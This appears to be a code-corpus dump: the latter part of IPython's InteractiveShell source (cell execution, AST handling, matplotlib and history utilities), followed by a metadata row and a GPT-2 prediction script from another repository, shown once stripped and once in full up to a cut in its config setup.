py3compat.execfile(
fname, glob, loc,
self.compile if shell_futures else None)
except SystemExit as status:
# If the call was made with 0 or None exit status (sys.exit(0)
# or sys.exit() ), don't bother showing a traceback, as both of
# these are considered normal by the OS:
# > python -c'import sys;sys.exit(0)'; echo $?
# 0
# > python -c'import sys;sys.exit()'; echo $?
# 0
# For other exit status, we show the exception unless
# explicitly silenced, but only in short form.
if status.code:
if raise_exceptions:
raise
if not exit_ignore:
self.showtraceback(exception_only=True)
except:
if raise_exceptions:
raise
# tb offset is 2 because we wrap execfile
self.showtraceback(tb_offset=2)
def safe_execfile_ipy(self, fname, shell_futures=False, raise_exceptions=False):
"""Like safe_execfile, but for .ipy or .ipynb files with IPython syntax.
Parameters
----------
fname : str
The name of the file to execute. The filename must have a
.ipy or .ipynb extension.
shell_futures : bool (False)
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
raise_exceptions : bool (False)
If True raise exceptions everywhere. Meant for testing.
"""
fname = os.path.abspath(os.path.expanduser(fname))
# Make sure we can open the file
try:
with open(fname):
pass
except:
warn('Could not open file <%s> for safe execution.' % fname)
return
# Find things also in current directory. This is needed to mimic the
# behavior of running a script from the system command line, where
# Python inserts the script's directory into sys.path
dname = os.path.dirname(fname)
def get_cells():
"""generator for sequence of code blocks to run"""
if fname.endswith('.ipynb'):
from nbformat import read
nb = read(fname, as_version=4)
if not nb.cells:
return
for cell in nb.cells:
if cell.cell_type == 'code':
yield cell.source
else:
with open(fname) as f:
yield f.read()
with prepended_to_syspath(dname):
try:
for cell in get_cells():
result = self.run_cell(cell, silent=True, shell_futures=shell_futures)
if raise_exceptions:
result.raise_error()
elif not result.success:
break
except:
if raise_exceptions:
raise
self.showtraceback()
warn('Unknown failure executing file: <%s>' % fname)
def safe_run_module(self, mod_name, where):
"""A safe version of runpy.run_module().
This version will never throw an exception, but instead print
helpful error messages to the screen.
`SystemExit` exceptions with status code 0 or None are ignored.
Parameters
----------
mod_name : string
The name of the module to be executed.
where : dict
The globals namespace.
"""
try:
try:
where.update(
runpy.run_module(str(mod_name), run_name="__main__",
alter_sys=True)
)
except SystemExit as status:
if status.code:
raise
except:
self.showtraceback()
warn('Unknown failure executing module: <%s>' % mod_name)
def run_cell(self, raw_cell, store_history=False, silent=False, shell_futures=True):
"""Run a complete IPython cell.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
Returns
-------
result : :class:`ExecutionResult`
"""
result = None
try:
result = self._run_cell(
raw_cell, store_history, silent, shell_futures)
finally:
self.events.trigger('post_execute')
if not silent:
self.events.trigger('post_run_cell', result)
return result
def _run_cell(self, raw_cell:str, store_history:bool, silent:bool, shell_futures:bool):
"""Internal method to run a complete IPython cell."""
# we need to avoid calling self.transform_cell multiple time on the same thing
# so we need to store some results:
preprocessing_exc_tuple = None
try:
transformed_cell = self.transform_cell(raw_cell)
except Exception:
transformed_cell = raw_cell
preprocessing_exc_tuple = sys.exc_info()
assert transformed_cell is not None
coro = self.run_cell_async(
raw_cell,
store_history=store_history,
silent=silent,
shell_futures=shell_futures,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
)
# run_cell_async is async, but may not actually need an eventloop.
# when this is the case, we want to run it using the pseudo_sync_runner
# so that code can invoke eventloops (for example via the %run , and
# `%paste` magic.
if self.trio_runner:
runner = self.trio_runner
elif self.should_run_async(
raw_cell,
transformed_cell=transformed_cell,
preprocessing_exc_tuple=preprocessing_exc_tuple,
):
runner = self.loop_runner
else:
runner = _pseudo_sync_runner
try:
return runner(coro)
except BaseException as e:
info = ExecutionInfo(raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
result.error_in_exec = e
self.showtraceback(running_compiled_code=True)
return result
return
def should_run_async(
self, raw_cell: str, *, transformed_cell=None, preprocessing_exc_tuple=None
) -> bool:
"""Return whether a cell should be run asynchronously via a coroutine runner
Parameters
----------
raw_cell: str
The code to be executed
Returns
-------
result: bool
Whether the code needs to be run with a coroutine runner or not
.. versionadded: 7.0
"""
if not self.autoawait:
return False
if preprocessing_exc_tuple is not None:
return False
assert preprocessing_exc_tuple is None
if transformed_cell is None:
warnings.warn(
"`should_run_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
try:
cell = self.transform_cell(raw_cell)
except Exception:
# any exception during transform will be raised
# prior to execution
return False
else:
cell = transformed_cell
return _should_be_async(cell)
async def run_cell_async(
self,
raw_cell: str,
store_history=False,
silent=False,
shell_futures=True,
*,
transformed_cell: Optional[str] = None,
preprocessing_exc_tuple: Optional[Any] = None
) -> ExecutionResult:
"""Run a complete IPython cell asynchronously.
Parameters
----------
raw_cell : str
The code (including IPython code such as %magic functions) to run.
store_history : bool
If True, the raw and translated cell will be stored in IPython's
history. For user code calling back into IPython's machinery, this
should be set to False.
silent : bool
If True, avoid side-effects, such as implicit displayhooks and
and logging. silent=True forces store_history=False.
shell_futures : bool
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
transformed_cell: str
cell that was passed through transformers
preprocessing_exc_tuple:
trace if the transformation failed.
Returns
-------
result : :class:`ExecutionResult`
.. versionadded: 7.0
"""
info = ExecutionInfo(
raw_cell, store_history, silent, shell_futures)
result = ExecutionResult(info)
if (not raw_cell) or raw_cell.isspace():
self.last_execution_succeeded = True
self.last_execution_result = result
return result
if silent:
store_history = False
if store_history:
result.execution_count = self.execution_count
def error_before_exec(value):
if store_history:
self.execution_count += 1
result.error_before_exec = value
self.last_execution_succeeded = False
self.last_execution_result = result
return result
self.events.trigger('pre_execute')
if not silent:
self.events.trigger('pre_run_cell', info)
if transformed_cell is None:
warnings.warn(
"`run_cell_async` will not call `transform_cell`"
" automatically in the future. Please pass the result to"
" `transformed_cell` argument and any exception that happen"
" during the"
"transform in `preprocessing_exc_tuple` in"
" IPython 7.17 and above.",
DeprecationWarning,
stacklevel=2,
)
# If any of our input transformation (input_transformer_manager or
# prefilter_manager) raises an exception, we store it in this variable
# so that we can display the error after logging the input and storing
# it in the history.
try:
cell = self.transform_cell(raw_cell)
except Exception:
preprocessing_exc_tuple = sys.exc_info()
cell = raw_cell # cell has to exist so it can be stored/logged
else:
preprocessing_exc_tuple = None
else:
if preprocessing_exc_tuple is None:
cell = transformed_cell
else:
cell = raw_cell
# Store raw and processed history
if store_history:
self.history_manager.store_inputs(self.execution_count,
cell, raw_cell)
if not silent:
self.logger.log(cell, raw_cell)
# Display the exception if input processing failed.
if preprocessing_exc_tuple is not None:
self.showtraceback(preprocessing_exc_tuple)
if store_history:
self.execution_count += 1
return error_before_exec(preprocessing_exc_tuple[1])
# Our own compiler remembers the __future__ environment. If we want to
# run code with a separate __future__ environment, use the default
# compiler
compiler = self.compile if shell_futures else self.compiler_class()
_run_async = False
with self.builtin_trap:
cell_name = self.compile.cache(
cell, self.execution_count, raw_code=raw_cell
)
with self.display_trap:
# Compile to bytecode
try:
if sys.version_info < (3,8) and self.autoawait:
if _should_be_async(cell):
# the code AST below will not be user code: we wrap it
# in an `async def`. This will likely make some AST
# transformer below miss some transform opportunity and
# introduce a small coupling to run_code (in which we
# bake some assumptions of what _ast_asyncify returns.
# they are ways around (like grafting part of the ast
# later:
# - Here, return code_ast.body[0].body[1:-1], as well
# as last expression in return statement which is
# the user code part.
# - Let it go through the AST transformers, and graft
# - it back after the AST transform
# But that seem unreasonable, at least while we
# do not need it.
code_ast = _ast_asyncify(cell, 'async-def-wrapper')
_run_async = True
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
else:
code_ast = compiler.ast_parse(cell, filename=cell_name)
except self.custom_exceptions as e:
etype, value, tb = sys.exc_info()
self.CustomTB(etype, value, tb)
return error_before_exec(e)
except IndentationError as e:
self.showindentationerror()
return error_before_exec(e)
except (OverflowError, SyntaxError, ValueError, TypeError,
MemoryError) as e:
self.showsyntaxerror()
return error_before_exec(e)
# Apply AST transformations
try:
code_ast = self.transform_ast(code_ast)
except InputRejected as e:
self.showtraceback()
return error_before_exec(e)
# Give the displayhook a reference to our ExecutionResult so it
# can fill in the output value.
self.displayhook.exec_result = result
# Execute the user code
interactivity = "none" if silent else self.ast_node_interactivity
if _run_async:
interactivity = 'async'
has_raised = await self.run_ast_nodes(code_ast.body, cell_name,
interactivity=interactivity, compiler=compiler, result=result)
self.last_execution_succeeded = not has_raised
self.last_execution_result = result
# Reset this so later displayed values do not modify the
# ExecutionResult
self.displayhook.exec_result = None
if store_history:
# Write output to the database. Does nothing unless
# history output logging is enabled.
self.history_manager.store_output(self.execution_count)
# Each cell is a *single* input, regardless of how many lines it has
self.execution_count += 1
return result
def transform_cell(self, raw_cell):
"""Transform an input cell before parsing it.
Static transformations, implemented in IPython.core.inputtransformer2,
deal with things like ``%magic`` and ``!system`` commands.
These run on all input.
Dynamic transformations, for things like unescaped magics and the exit
autocall, depend on the state of the interpreter.
These only apply to single line inputs.
These string-based transformations are followed by AST transformations;
see :meth:`transform_ast`.
"""
# Static input transformations
cell = self.input_transformer_manager.transform_cell(raw_cell)
if len(cell.splitlines()) == 1:
# Dynamic transformations - only applied for single line commands
with self.builtin_trap:
# use prefilter_lines to handle trailing newlines
# restore trailing newline for ast.parse
cell = self.prefilter_manager.prefilter_lines(cell) + '\n'
lines = cell.splitlines(keepends=True)
for transform in self.input_transformers_post:
lines = transform(lines)
cell = ''.join(lines)
return cell
def transform_ast(self, node):
"""Apply the AST transformations from self.ast_transformers
Parameters
----------
node : ast.Node
The root node to be transformed. Typically called with the ast.Module
produced by parsing user input.
Returns
-------
An ast.Node corresponding to the node it was called with. Note that it
may also modify the passed object, so don't rely on references to the
original AST.
"""
for transformer in self.ast_transformers:
try:
node = transformer.visit(node)
except InputRejected:
# User-supplied AST transformers can reject an input by raising
# an InputRejected. Short-circuit in this case so that we
# don't unregister the transform.
raise
except Exception:
warn("AST transformer %r threw an error. It will be unregistered." % transformer)
self.ast_transformers.remove(transformer)
if self.ast_transformers:
ast.fix_missing_locations(node)
return node
async def run_ast_nodes(self, nodelist:ListType[AST], cell_name:str, interactivity='last_expr',
compiler=compile, result=None):
"""Run a sequence of AST nodes. The execution mode depends on the
interactivity parameter.
Parameters
----------
nodelist : list
A sequence of AST nodes to run.
cell_name : str
Will be passed to the compiler as the filename of the cell. Typically
the value returned by ip.compile.cache(cell).
interactivity : str
'all', 'last', 'last_expr' , 'last_expr_or_assign' or 'none',
specifying which nodes should be run interactively (displaying output
from expressions). 'last_expr' will run the last node interactively
only if it is an expression (i.e. expressions in loops or other blocks
are not displayed) 'last_expr_or_assign' will run the last expression
or the last assignment. Other values for this parameter will raise a
ValueError.
Experimental value: 'async' Will try to run top level interactive
async/await code in default runner, this will not respect the
interactivity setting and will only run the last node if it is an
expression.
compiler : callable
A function with the same interface as the built-in compile(), to turn
the AST nodes into code objects. Default is the built-in compile().
result : ExecutionResult, optional
An object to store exceptions that occur during execution.
Returns
-------
True if an exception occurred while running code, False if it finished
running.
"""
if not nodelist:
return
if interactivity == 'last_expr_or_assign':
if isinstance(nodelist[-1], _assign_nodes):
asg = nodelist[-1]
if isinstance(asg, ast.Assign) and len(asg.targets) == 1:
target = asg.targets[0]
elif isinstance(asg, _single_targets_nodes):
target = asg.target
else:
target = None
if isinstance(target, ast.Name):
nnode = ast.Expr(ast.Name(target.id, ast.Load()))
ast.fix_missing_locations(nnode)
nodelist.append(nnode)
interactivity = 'last_expr'
_async = False
if interactivity == 'last_expr':
if isinstance(nodelist[-1], ast.Expr):
interactivity = "last"
else:
interactivity = "none"
if interactivity == 'none':
to_run_exec, to_run_interactive = nodelist, []
elif interactivity == 'last':
to_run_exec, to_run_interactive = nodelist[:-1], nodelist[-1:]
elif interactivity == 'all':
to_run_exec, to_run_interactive = [], nodelist
elif interactivity == 'async':
to_run_exec, to_run_interactive = [], nodelist
_async = True
else:
raise ValueError("Interactivity was %r" % interactivity)
try:
if _async and sys.version_info > (3,8):
raise ValueError("This branch should never happen on Python 3.8 and above, "
"please try to upgrade IPython and open a bug report with your case.")
if _async:
# If interactivity is async the semantics of run_code are
# completely different Skip usual machinery.
mod = Module(nodelist, [])
async_wrapper_code = compiler(mod, cell_name, 'exec')
exec(async_wrapper_code, self.user_global_ns, self.user_ns)
async_code = removed_co_newlocals(self.user_ns.pop('async-def-wrapper')).__code__
if (await self.run_code(async_code, result, async_=True)):
return True
else:
if sys.version_info > (3, 8):
def compare(code):
is_async = (inspect.CO_COROUTINE & code.co_flags == inspect.CO_COROUTINE)
return is_async
else:
def compare(code):
return _async
# refactor that to just change the mod constructor.
to_run = []
for node in to_run_exec:
to_run.append((node, 'exec'))
for node in to_run_interactive:
to_run.append((node, 'single'))
for node,mode in to_run:
if mode == 'exec':
mod = Module([node], [])
elif mode == 'single':
mod = ast.Interactive([node])
with compiler.extra_flags(getattr(ast, 'PyCF_ALLOW_TOP_LEVEL_AWAIT', 0x0) if self.autoawait else 0x0):
code = compiler(mod, cell_name, mode)
asy = compare(code)
if (await self.run_code(code, result, async_=asy)):
return True
# Flush softspace
if softspace(sys.stdout, 0):
print()
except:
# It's possible to have exceptions raised here, typically by
# compilation of odd code (such as a naked 'return' outside a
# function) that did parse but isn't valid. Typically the exception
# is a SyntaxError, but it's safest just to catch anything and show
# the user a traceback.
# We do only one try/except outside the loop to minimize the impact
# on runtime, and also because if any node in the node list is
# broken, we should stop execution completely.
if result:
result.error_before_exec = sys.exc_info()[1]
self.showtraceback()
return True
return False
def _async_exec(self, code_obj: types.CodeType, user_ns: dict):
"""
Evaluate an asynchronous code object using a code runner
Fake asynchronous execution of code_object in a namespace via a proxy namespace.
Returns coroutine object, which can be executed via async loop runner
WARNING: The semantics of `async_exec` are quite different from `exec`,
in particular you can only pass a single namespace. It also return a
handle to the value of the last things returned by code_object.
"""
return eval(code_obj, user_ns)
async def run_code(self, code_obj, result=None, *, async_=False):
"""Execute a code object.
When an exception occurs, self.showtraceback() is called to display a
traceback.
Parameters
----------
code_obj : code object
A compiled code object, to be executed
result : ExecutionResult, optional
An object to store exceptions that occur during execution.
async_ : Bool (Experimental)
Attempt to run top-level asynchronous code in a default loop.
Returns
-------
False : successful execution.
True : an error occurred.
"""
# special value to say that anything above is IPython and should be
# hidden.
__tracebackhide__ = "__ipython_bottom__"
# Set our own excepthook in case the user code tries to call it
# directly, so that the IPython crash handler doesn't get triggered
old_excepthook, sys.excepthook = sys.excepthook, self.excepthook
# we save the original sys.excepthook in the instance, in case config
# code (such as magics) needs access to it.
self.sys_excepthook = old_excepthook
outflag = True # happens in more places, so it's easier as default
try:
try:
self.hooks.pre_run_code_hook()
if async_ and sys.version_info < (3,8):
last_expr = (await self._async_exec(code_obj, self.user_ns))
code = compile('last_expr', 'fake', "single")
exec(code, {'last_expr': last_expr})
elif async_ :
await eval(code_obj, self.user_global_ns, self.user_ns)
else:
exec(code_obj, self.user_global_ns, self.user_ns)
finally:
# Reset our crash handler in place
sys.excepthook = old_excepthook
except SystemExit as e:
if result is not None:
result.error_in_exec = e
self.showtraceback(exception_only=True)
warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)
except self.custom_exceptions:
etype, value, tb = sys.exc_info()
if result is not None:
result.error_in_exec = value
self.CustomTB(etype, value, tb)
except:
if result is not None:
result.error_in_exec = sys.exc_info()[1]
self.showtraceback(running_compiled_code=True)
else:
outflag = False
return outflag
# For backwards compatibility
runcode = run_code
def check_complete(self, code: str) -> Tuple[str, str]:
"""Return whether a block of code is ready to execute, or should be continued
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent : str
When status is 'incomplete', this is some whitespace to insert on
the next line of the prompt.
"""
status, nspaces = self.input_transformer_manager.check_complete(code)
return status, ' ' * (nspaces or 0)
#-------------------------------------------------------------------------
# Things related to GUI support and pylab
#-------------------------------------------------------------------------
active_eventloop = None
def enable_gui(self, gui=None):
raise NotImplementedError('Implement enable_gui in a subclass')
def enable_matplotlib(self, gui=None):
"""Enable interactive matplotlib and inline figure support.
This takes the following steps:
1. select the appropriate eventloop and matplotlib backend
2. set up matplotlib for interactive use with that backend
3. configure formatters for inline figure display
4. enable the selected gui eventloop
Parameters
----------
gui : optional, string
If given, dictates the choice of matplotlib GUI backend to use
(should be one of IPython's supported backends, 'qt', 'osx', 'tk',
'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
matplotlib (as dictated by the matplotlib build-time options plus the
user's matplotlibrc configuration file). Note that not all backends
make sense in all contexts, for example a terminal ipython can't
display figures inline.
"""
from IPython.core import pylabtools as pt
gui, backend = pt.find_gui_and_backend(gui, self.pylab_gui_select)
if gui != 'inline':
# If we have our first gui selection, store it
if self.pylab_gui_select is None:
self.pylab_gui_select = gui
# Otherwise if they are different
elif gui != self.pylab_gui_select:
print('Warning: Cannot change to a different GUI toolkit: %s.'
' Using %s instead.' % (gui, self.pylab_gui_select))
gui, backend = pt.find_gui_and_backend(self.pylab_gui_select)
pt.activate_matplotlib(backend)
pt.configure_inline_support(self, backend)
# Now we must activate the gui pylab wants to use, and fix %run to take
# plot updates into account
self.enable_gui(gui)
self.magics_manager.registry['ExecutionMagics'].default_runner = \
pt.mpl_runner(self.safe_execfile)
return gui, backend
def enable_pylab(self, gui=None, import_all=True, welcome_message=False):
"""Activate pylab support at runtime.
This turns on support for matplotlib, preloads into the interactive
namespace all of numpy and pylab, and configures IPython to correctly
interact with the GUI event loop. The GUI backend to be used can be
optionally selected with the optional ``gui`` argument.
This method only adds preloading the namespace to InteractiveShell.enable_matplotlib.
Parameters
----------
gui : optional, string
If given, dictates the choice of matplotlib GUI backend to use
(should be one of IPython's supported backends, 'qt', 'osx', 'tk',
'gtk', 'wx' or 'inline'), otherwise we use the default chosen by
matplotlib (as dictated by the matplotlib build-time options plus the
user's matplotlibrc configuration file). Note that not all backends
make sense in all contexts, for example a terminal ipython can't
display figures inline.
import_all : optional, bool, default: True
Whether to do `from numpy import *` and `from pylab import *`
in addition to module imports.
welcome_message : deprecated
This argument is ignored, no welcome message will be displayed.
"""
from IPython.core.pylabtools import import_pylab
gui, backend = self.enable_matplotlib(gui)
# We want to prevent the loading of pylab to pollute the user's
# namespace as shown by the %who* magics, so we execute the activation
# code in an empty namespace, and we update *both* user_ns and
# user_ns_hidden with this information.
ns = {}
import_pylab(ns, import_all)
# warn about clobbered names
ignored = {"__builtins__"}
both = set(ns).intersection(self.user_ns).difference(ignored)
clobbered = [ name for name in both if self.user_ns[name] is not ns[name] ]
self.user_ns.update(ns)
self.user_ns_hidden.update(ns)
return gui, backend, clobbered
#-------------------------------------------------------------------------
# Utilities
#-------------------------------------------------------------------------
def var_expand(self, cmd, depth=0, formatter=DollarFormatter()):
"""Expand python variables in a string.
The depth argument indicates how many frames above the caller should
be walked to look for the local namespace where to expand variables.
The global namespace for expansion is always the user's interactive
namespace.
"""
ns = self.user_ns.copy()
try:
frame = sys._getframe(depth+1)
except ValueError:
# This is thrown if there aren't that many frames on the stack,
# e.g. if a script called run_line_magic() directly.
pass
else:
ns.update(frame.f_locals)
try:
# We have to use .vformat() here, because 'self' is a valid and common
# name, and expanding **ns for .format() would make it collide with
# the 'self' argument of the method.
cmd = formatter.vformat(cmd, args=[], kwargs=ns)
except Exception:
# if formatter couldn't format, just let it go untransformed
pass
return cmd
def mktempfile(self, data=None, prefix='ipython_edit_'):
"""Make a new tempfile and return its filename.
This makes a call to tempfile.mkstemp (created in a tempfile.mkdtemp),
but it registers the created filename internally so ipython cleans it up
at exit time.
Optional inputs:
- data(None): if data is given, it gets written out to the temp file
immediately, and the file is closed again."""
dirname = tempfile.mkdtemp(prefix=prefix)
self.tempdirs.append(dirname)
handle, filename = tempfile.mkstemp('.py', prefix, dir=dirname)
os.close(handle) # On Windows, there can only be one open handle on a file
self.tempfiles.append(filename)
if data:
with open(filename, 'w') as tmp_file:
tmp_file.write(data)
return filename
@undoc
def write(self,data):
"""DEPRECATED: Write a string to the default output"""
warn('InteractiveShell.write() is deprecated, use sys.stdout instead',
DeprecationWarning, stacklevel=2)
sys.stdout.write(data)
@undoc
def write_err(self,data):
"""DEPRECATED: Write a string to the default error output"""
warn('InteractiveShell.write_err() is deprecated, use sys.stderr instead',
DeprecationWarning, stacklevel=2)
sys.stderr.write(data)
def ask_yes_no(self, prompt, default=None, interrupt=None):
if self.quiet:
return True
return ask_yes_no(prompt,default,interrupt)
def show_usage(self):
"""Show a usage message"""
page.page(IPython.core.usage.interactive_usage)
def extract_input_lines(self, range_str, raw=False):
"""Return as a string a set of input history slices.
Parameters
----------
range_str : string
The set of slices is given as a string, like "~5/6-~4/2 4:8 9",
since this function is for use by magic functions which get their
arguments as strings. The number before the / is the session
number: ~n goes n back from the current session.
raw : bool, optional
By default, the processed input is used. If this is true, the raw
input history is used instead.
Notes
-----
Slices can be described with two notations:
* ``N:M`` -> standard python form, means including items N...(M-1).
* ``N-M`` -> include items N..M (closed endpoint).
"""
lines = self.history_manager.get_range_by_str(range_str, raw=raw)
return "\n".join(x for _, _, x in lines)
def find_user_code(self, target, raw=True, py_only=False, skip_encoding_cookie=True, search_ns=False):
"""Get a code string from history, file, url, or a string or macro.
This is mainly used by magic functions.
Parameters
----------
target : str
A string specifying code to retrieve. This will be tried respectively
as: ranges of input history (see %history for syntax), url,
corresponding .py file, filename, or an expression evaluating to a
string or Macro in the user namespace.
raw : bool
If true (default), retrieve raw history. Has no effect on the other
retrieval mechanisms.
py_only : bool (default False)
Only try to fetch python code, do not try alternative methods to decode file
if unicode fails.
Returns
-------
A string of code.
ValueError is raised if nothing is found, and TypeError if it evaluates
to an object of another type. In each case, .args[0] is a printable
message.
"""
code = self.extract_input_lines(target, raw=raw) # Grab history
if code:
return code
try:
if target.startswith(('http://', 'https://')):
return openpy.read_py_url(target, skip_encoding_cookie=skip_encoding_cookie)
except UnicodeDecodeError:
if not py_only :
# Deferred import
from urllib.request import urlopen
response = urlopen(target)
return response.read().decode('latin1')
raise ValueError(("'%s' seem to be unreadable.") % target)
potential_target = [target]
try :
potential_target.insert(0,get_py_filename(target))
except IOError:
pass
for tgt in potential_target :
if os.path.isfile(tgt): # Read file
try :
return openpy.read_py_file(tgt, skip_encoding_cookie=skip_encoding_cookie)
except UnicodeDecodeError :
if not py_only :
with io_open(tgt,'r', encoding='latin1') as f :
return f.read()
raise ValueError(("'%s' seem to be unreadable.") % target)
elif os.path.isdir(os.path.expanduser(tgt)):
raise ValueError("'%s' is a directory, not a regular file." % target)
if search_ns:
# Inspect namespace to load object source
object_info = self.object_inspect(target, detail_level=1)
if object_info['found'] and object_info['source']:
return object_info['source']
try: # User namespace
codeobj = eval(target, self.user_ns)
except Exception:
raise ValueError(("'%s' was not found in history, as a file, url, "
"nor in the user namespace.") % target)
if isinstance(codeobj, str):
return codeobj
elif isinstance(codeobj, Macro):
return codeobj.value
raise TypeError("%s is neither a string nor a macro." % target,
codeobj)
#-------------------------------------------------------------------------
# Things related to IPython exiting
#-------------------------------------------------------------------------
def atexit_operations(self):
"""This will be executed at the time of exit.
Cleanup operations and saving of persistent data that is done
unconditionally by IPython should be performed here.
For things that may depend on startup flags or platform specifics (such
as having readline or not), register a separate atexit function in the
code that has the appropriate information, rather than trying to
clutter
"""
# Close the history session (this stores the end time and line count)
# this must be *before* the tempfile cleanup, in case of temporary
# history db
self.history_manager.end_session()
# Cleanup all tempfiles and folders left around
for tfile in self.tempfiles:
try:
os.unlink(tfile)
except OSError:
pass
for tdir in self.tempdirs:
try:
os.rmdir(tdir)
except OSError:
pass
# Clear all user namespaces to release all references cleanly.
self.reset(new_session=False)
# Run user hooks
self.hooks.shutdown_hook()
def cleanup(self):
self.restore_sys_module_state()
# Overridden in terminal subclass to change prompts
def switch_doctest_mode(self, mode):
pass
class InteractiveShellABC(metaclass=abc.ABCMeta):
"""An abstract base class for InteractiveShell."""
InteractiveShellABC.register(InteractiveShell)
| 22,915 | 14 | 1,687 |
c1200136115196f12f5dc1202f6193b76d966255 | 6,935 | py | Python | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null | predict/gpt_predict.py | yyht/gpt2_ml_my | e0a5fae90022ecf97c4f244cfd3aa8a418787296 | [
"Apache-2.0"
] | null | null | null |
import sys,os
father_path = os.path.join(os.getcwd())
print(father_path, "==father path==")
bert_path = find_bert(father_path)
# t2t_bert_path = os.path.join(bert_path, "t2t_bert")
# sys.path.extend([bert_path, t2t_bert_path])
sys.path.extend([bert_path])
print(sys.path)
from predict import AppPredictor
from predict.preprocessors import GPTPreprocessor
from predict.postprocessors import GPTPostprocessor
import tensorflow as tf
from train.modeling import GroverModel, GroverConfig, sample
from bunch import Bunch
from predict.app_utils import get_selected_columns_schema
_app_flags = tf.app.flags
_app_flags.DEFINE_string("inputTable", default=None, help='Input table (only for pai cmd)')
_app_flags.DEFINE_string("outputTable", default=None, help='Output table (only for pai cmd)')
_app_flags.DEFINE_string("inputSchema", default=None,
help='Only for csv data, the schema of input table')
_app_flags.DEFINE_string("firstSequence", default=None,
help='Which column is the first sequence mapping to')
_app_flags.DEFINE_string("secondSequence", default=None,
help='Which column is the second sequence mapping to')
_app_flags.DEFINE_string("appendCols", default=None,
help='Which columns will be appended on the outputs')
_app_flags.DEFINE_string("outputSchema", default="pool_output,first_token_output,all_hidden_outputs",
help='The choices of output features')
_app_flags.DEFINE_integer("sequenceLength", default=128,
help='Maximum overall sequence length.')
_app_flags.DEFINE_string("modelName", default='',
help='Name of pretrained model')
_app_flags.DEFINE_integer("batchSize", default=32,
help='Maximum overall sequence length.')
_APP_FLAGS = _app_flags.FLAGS
app_config = GPTConfig()
predictor = AppPredictor(app_config,
thread_num=1,
queue_size=256,
job_name="app_predictor")
preprocessor = GPTPreprocessor(app_config,
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
postprocessor = GPTPostprocessor(app_config,
prediction_colname="predictions",
thread_num=predictor.thread_num,
input_queue=queue.Queue(),
output_queue=queue.Queue())
predictor.run_predict(reader=None,
preprocessor=preprocessor,
postprocessor=postprocessor,
writer=None)
| 44.455128 | 133 | 0.65119 |
import sys,os
father_path = os.path.join(os.getcwd())
print(father_path, "==father path==")
def find_bert(father_path):
if father_path.split("/")[-1] == "gpt2_ml_my":
return father_path
output_path = ""
for fi in os.listdir(father_path):
if fi == "gpt2_ml_my":
output_path = os.path.join(father_path, fi)
break
else:
if os.path.isdir(os.path.join(father_path, fi)):
find_bert(os.path.join(father_path, fi))
else:
continue
return output_path
bert_path = find_bert(father_path)
# t2t_bert_path = os.path.join(bert_path, "t2t_bert")
# sys.path.extend([bert_path, t2t_bert_path])
sys.path.extend([bert_path])
print(sys.path)
from predict import AppPredictor
from predict.preprocessors import GPTPreprocessor
from predict.postprocessors import GPTPostprocessor
import tensorflow as tf
from train.modeling import GroverModel, GroverConfig, sample
from bunch import Bunch
from predict.app_utils import get_selected_columns_schema
_app_flags = tf.app.flags
_app_flags.DEFINE_string("inputTable", default=None, help='Input table (only for pai cmd)')
_app_flags.DEFINE_string("outputTable", default=None, help='Output table (only for pai cmd)')
_app_flags.DEFINE_string("inputSchema", default=None,
help='Only for csv data, the schema of input table')
_app_flags.DEFINE_string("firstSequence", default=None,
help='Which column is the first sequence mapping to')
_app_flags.DEFINE_string("secondSequence", default=None,
help='Which column is the second sequence mapping to')
_app_flags.DEFINE_string("appendCols", default=None,
help='Which columns will be appended on the outputs')
_app_flags.DEFINE_string("outputSchema", default="pool_output,first_token_output,all_hidden_outputs",
help='The choices of output features')
_app_flags.DEFINE_integer("sequenceLength", default=128,
help='Maximum overall sequence length.')
_app_flags.DEFINE_string("modelName", default='',
help='Name of pretrained model')
_app_flags.DEFINE_integer("batchSize", default=32,
help='Maximum overall sequence length.')
_APP_FLAGS = _app_flags.FLAGS
class GPTConfig(object):
def __init__(self):
""" Configuration adapter for `ez_bert_feat`
It adapts user command args to configuration protocol of `ez_transfer` engine
"""
input_table = FLAGS.tables
output_table = FLAGS.outputs
all_input_col_names = get_all_columns_name(input_table)
first_sequence = _APP_FLAGS.firstSequence
assert first_sequence in all_input_col_names, "The first sequence should be in input schema"
second_sequence = _APP_FLAGS.secondSequence
if second_sequence not in all_input_col_names:
second_sequence = ""
append_columns = [t for t in _APP_FLAGS.appendCols.split(",") if t and t in all_input_col_names] \
if _APP_FLAGS.appendCols else []
tf.logging.info(input_table)
selected_cols_set = [first_sequence]
if second_sequence:
selected_cols_set.append(second_sequence)
selected_cols_set.extend(append_columns)
selected_cols_set = set(selected_cols_set)
input_schema = get_selected_columns_schema(input_table, selected_cols_set)
output_schema = _APP_FLAGS.outputSchema
for column_name in append_columns:
output_schema += "," + column_name
config_json = {
"preprocess_config": {
"input_schema": input_schema,
"output_schema": output_schema,
"first_sequence": first_sequence,
"second_sequence": second_sequence,
